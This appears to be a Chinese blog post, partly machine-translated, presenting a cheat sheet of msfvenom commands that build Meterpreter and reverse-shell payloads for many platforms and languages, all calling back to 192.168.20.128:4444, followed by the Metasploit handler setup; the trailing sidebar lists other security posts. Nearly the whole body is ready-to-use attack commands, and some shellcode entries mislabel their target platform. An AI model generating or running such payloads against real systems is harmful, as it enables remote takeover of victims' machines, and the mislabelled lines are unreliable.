当前位置:网站首页>MSF generate payload Encyclopedia
MSF generate payload Encyclopedia
2022-07-06 14:07:00 【Unknown white hat】
Catalog
resources
msf Generate payload Complete works of _ Unknown white hat blog -CSDN Blog
One 、payload
1.windwos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe
2.liunx
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf
3.mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho
4.android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk
5.Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
6.shellcode(windwos)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c
7.shellcode(liunx)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c
8.shellcode(mac)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c
Two 、 rebound shell
1.python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
2.bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh
3.Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl
4.Lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua
5.Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb
6.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
7.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx
8.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp
9.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp
10.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war
11.nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js
3、 ... and 、 monitor
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options # Leak filling
exploit
边栏推荐
- Difference and understanding between detected and non detected anomalies
- QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
- msf生成payload大全
- HackMyvm靶机系列(3)-visions
- 7-3 构造散列表(PTA程序设计)
- 【Numpy和Pytorch的数据处理】
- 7-7 7003 组合锁(PTA程序设计)
- 小程序web抓包-fiddler
- 1143_ SiCp learning notes_ Tree recursion
- 撲克牌遊戲程序——人機對抗
猜你喜欢

HackMyvm靶機系列(3)-visions

强化学习基础记录

撲克牌遊戲程序——人機對抗

SRC挖掘思路及方法

Mixlab unbounded community white paper officially released

中间件漏洞复现—apache

2. First knowledge of C language (2)

记一次edu,SQL注入实战

Hackmyvm target series (4) -vulny

Record a penetration of the cat shed from outside to inside. Library operation extraction flag
随机推荐
Read only error handling
Analysis of penetration test learning and actual combat stage
. How to upload XMIND files to Jinshan document sharing online editing?
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
Implementation principle of automatic capacity expansion mechanism of ArrayList
2. First knowledge of C language (2)
攻防世界MISC练习区(gif 掀桌子 ext3 )
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
记一次edu,SQL注入实战
Difference and understanding between detected and non detected anomalies
Hackmyvm target series (3) -visions
[data processing of numpy and pytoch]
7-1 output all primes between 2 and n (PTA programming)
【MySQL数据库的学习】
Wechat applet
SRC mining ideas and methods
网络基础详解
浅谈漏洞发现思路
The difference between abstract classes and interfaces
Experiment 9 input and output stream (excerpt)